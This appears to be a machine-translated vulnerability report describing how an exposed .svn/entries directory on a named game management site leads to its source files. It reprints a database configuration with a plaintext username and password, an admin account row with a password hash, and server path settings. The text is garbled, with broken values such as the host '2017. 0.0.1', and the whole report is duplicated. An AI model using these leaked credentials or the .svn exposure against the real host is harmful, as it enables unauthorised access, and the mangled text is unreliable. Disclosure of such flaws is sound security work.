Sensitive information leakage of a GM system is first caused by svn leakage,
Http://qa.tank.duowan.com/manage/.svn/entries
But found that svn can not view what files, but you can know the approximate Directory, direct access for a long time exposed the source code http://qa.tank.duowan.com/manage/ SQL /dbcfg.py
HOST = '2017. 0.0.1'
USER = 'tkgame'
PAWD = 'tkgame'
PORT = 0
DBNAME = 'tkt _ manage'
#
EXECUTETYPE = 'Update'
BUILDSQL = 'Table _ defines. SQL'
UPDATELOG = 'update. ini'
UPDATETABLE = '_ db_update_log'
BUILDUPDATESQL = '_ db_update_log. SQL'
BACKUPSQLPREFIX = 'bk _'
Http://qa.tank.duowan.com/manage/ SQL /table_defines. SQL
Insert into 'user' ('User _ id', 'User _ name', 'User _ password', 'User _ level', 'User _ created ') VALUES
(1, 'sixcube ', '6511383c766f89361b27f1d0d4f25956', 2, 1338946866 );
Http://qa.tank.duowan.com/manage/i18n/config.sh
ROOT_PATH =/var/www/wwwroot/tkt/manage
I18N_PATH = $ ROOT_PATH/i18n
I18N_DOMAIN = tkt_manage
LANG_LIST = ('/usr/bin/php-q getLangList. php ');
LEN_OF_LANG_LIST =$ {# LANG_LIST [@]}
First, svn leakage,
Http://qa.tank.duowan.com/manage/.svn/entries
But found that svn can not view what files, but you can know the approximate Directory, direct access for a long time exposed the source code http://qa.tank.duowan.com/manage/ SQL /dbcfg.py
HOST = '2017. 0.0.1'
USER = 'tkgame'
PAWD = 'tkgame'
PORT = 0
DBNAME = 'tkt _ manage'
#
EXECUTETYPE = 'Update'
BUILDSQL = 'Table _ defines. SQL'
UPDATELOG = 'update. ini'
UPDATETABLE = '_ db_update_log'
BUILDUPDATESQL = '_ db_update_log. SQL'
BACKUPSQLPREFIX = 'bk _'
Proof of vulnerability:
Http://qa.tank.duowan.com/manage/ SQL /table_defines. SQL
Insert into 'user' ('User _ id', 'User _ name', 'User _ password', 'User _ level', 'User _ created ') VALUES
(1, 'sixcube ', '6511383c766f89361b27f1d0d4f25956', 2, 1338946866 );
Http://qa.tank.duowan.com/manage/i18n/config.sh
ROOT_PATH =/var/www/wwwroot/tkt/manage
I18N_PATH = $ ROOT_PATH/i18n
I18N_DOMAIN = tkt_manage
LANG_LIST = ('/usr/bin/php-q getLangList. php ');
LEN_OF_LANG_LIST =$ {# LANG_LIST [@]}